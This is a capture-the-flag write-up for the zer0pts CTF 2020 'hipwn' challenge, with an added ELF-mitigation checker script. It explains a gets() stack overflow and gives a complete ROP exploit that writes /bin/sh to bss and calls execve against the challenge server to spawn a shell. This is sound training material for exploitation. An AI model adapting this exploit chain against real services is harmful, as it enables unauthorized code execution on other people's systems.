
[zer0pts CTF 2020] hipwn

tags: zer0pts CTF pwn

Overview

We're given an ELF and its source code. RELRO is only partial, and the stack canary (SSP) and PIE are disabled.

```
$ checksec -f chall
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified       Fortifiable  FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   No Symbols      No      0               0       chall
```
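The checksec columns above come straight from the ELF headers, so it is useful to see how they are derived. The following script is an added example, not part of the writeup, that reads the ELF64 header and program headers with only the standard library and reports NX (a `PT_GNU_STACK` segment without `PF_X`), RELRO (a `PT_GNU_RELRO` segment; the full/partial distinction also needs `DT_BIND_NOW` from the dynamic section, which this checker does not parse), PIE (`ET_DYN`) and a canary heuristic (a `__stack_chk_fail` reference, found by byte search rather than a real symbol-table lookup). The images it inspects are constructed inline with `build_elf64`, a hypothetical helper that emits headers only; one mirrors the profile in the checksec output, the other a hardened build.

```python
import struct

# ELF constants (ELF64 / System V ABI)
ET_EXEC, ET_DYN = 2, 3
PT_GNU_STACK = 0x6474e551
PT_GNU_RELRO = 0x6474e552
PF_X = 0x1


def parse_elf64(elf: bytes):
    """Return (e_type, [(p_type, p_flags), ...]) from a little-endian ELF64 image."""
    if elf[:4] != b"\x7fELF" or elf[4] != 2 or elf[5] != 1:
        raise ValueError("not a little-endian ELF64 image")
    (e_type,) = struct.unpack_from("<H", elf, 16)
    (e_phoff,) = struct.unpack_from("<Q", elf, 32)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 54)
    phdrs = []
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        p_type, p_flags = struct.unpack_from("<II", elf, off)
        phdrs.append((p_type, p_flags))
    return e_type, phdrs


def check_mitigations(elf: bytes) -> dict:
    """Simplified checksec: derive RELRO / canary / NX / PIE from the headers."""
    e_type, phdrs = parse_elf64(elf)
    flags_by_type = {p_type: p_flags for p_type, p_flags in phdrs}
    # NX: the loader honours a PT_GNU_STACK segment without PF_X; with no such
    # segment at all the stack is executable by default on x86.
    nx = PT_GNU_STACK in flags_by_type and not (flags_by_type[PT_GNU_STACK] & PF_X)
    # RELRO: PT_GNU_RELRO marks pages made read-only after relocation. Full RELRO
    # additionally needs DT_BIND_NOW, which this checker does not parse, so it
    # only distinguishes "No" from "Partial".
    relro = "Partial" if PT_GNU_RELRO in flags_by_type else "No"
    # Canary heuristic: SSP-instrumented code references __stack_chk_fail; a byte
    # search stands in for a symbol-table lookup here.
    canary = b"__stack_chk_fail" in elf
    pie = e_type == ET_DYN
    return {"relro": relro, "canary": canary, "nx": nx, "pie": pie}


def build_elf64(e_type: int, phdrs: list, tail: bytes = b"") -> bytes:
    """Constructed minimal ELF64 image: header + program headers, no real code."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8  # 64-bit, LE, v1, SysV
    ehdr = ident + struct.pack(
        "<HHIQQQIHHHHHH",
        e_type, 62, 1, 0x400000,        # e_type, EM_X86_64, e_version, e_entry
        64, 0, 0,                       # e_phoff, e_shoff, e_flags
        64, 56, len(phdrs), 64, 0, 0,   # sizes and counts
    )
    body = b"".join(
        struct.pack("<IIQQQQQQ", p_type, p_flags, 0, 0, 0, 0, 0, 0x1000)
        for p_type, p_flags in phdrs
    )
    return ehdr + body + tail


# Constructed profile matching the checksec line: non-PIE, RW stack,
# PT_GNU_RELRO present, no canary reference.
CHALL_LIKE = build_elf64(ET_EXEC, [(1, 5), (PT_GNU_STACK, 6), (PT_GNU_RELRO, 4)])
# Constructed hardened profile: PIE plus an SSP reference.
HARDENED = build_elf64(ET_DYN, [(1, 5), (PT_GNU_STACK, 6), (PT_GNU_RELRO, 4)],
                       tail=b"__stack_chk_fail\x00")

if __name__ == "__main__":
    for name, img in (("chall-like", CHALL_LIKE), ("hardened", HARDENED)):
        print(name, check_mitigations(img))
```

Run against a real file with `check_mitigations(open("chall", "rb").read())`; the chall-like image reports `{'relro': 'Partial', 'canary': False, 'nx': True, 'pie': False}`, the same profile checksec printed above.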

Solution

Vulnerability

You'll find the vulnerability immediately by reading the source code: it reads input with gets, which has no length limit, so there is a stack buffer overflow.
Since the binary is statically linked there is no libc to return into, so we get the shell with a ROP chain built from gadgets in the binary itself.

Plan

We craft a ROP chain equivalent to the following code:

```asm
mov rdi, "/bin/sh\0"   ; pointer to the string
mov rsi, 0
mov rdx, 0
mov rax, 59            ; SYS_execve
syscall
```

The string /bin/sh does not exist in the binary, so we have to write it to bss or some other writable address first; the exploit does this by calling gets a second time with a bss address as its buffer.

Exploit

```python
from ptrlib import *

#sock = Process("../distfiles/chall")
sock = Socket("13.231.207.73", 9010)

# gadget addresses in the statically linked, non-PIE binary
rop_pop_rdx = 0x004023f5
rop_pop_rsi_r15 = 0x0040141a
rop_pop_rdi = 0x0040141c
rop_pop_rax = 0x00400121
rop_syscall = 0x004024dd
addr_gets = 0x4004ee
addr_binsh = 0x604800        # writable address in bss for "/bin/sh"

payload = b'A' * 0x108       # padding up to the saved return address
# 1st stage: gets(addr_binsh) reads "/bin/sh" from the second line we send
payload += p64(rop_pop_rdi)
payload += p64(addr_binsh)
payload += p64(addr_gets)
# 2nd stage: execve(addr_binsh, 0, 0); registers are set after gets returns
# because the call clobbers them
payload += p64(rop_pop_rax)
payload += p64(59)           # SYS_execve
payload += p64(rop_pop_rdx)
payload += p64(0)            # envp
payload += p64(rop_pop_rsi_r15)
payload += p64(0)            # argv
payload += p64(0xdeadbeef)   # junk for r15
payload += p64(rop_pop_rdi)
payload += p64(addr_binsh)   # pathname
payload += p64(rop_syscall)

sock.recvline()              # consume the prompt
sock.sendline(payload)       # overflow via the first gets

sock.sendline("/bin/sh")     # consumed by the second gets into bss

sock.interactive()
```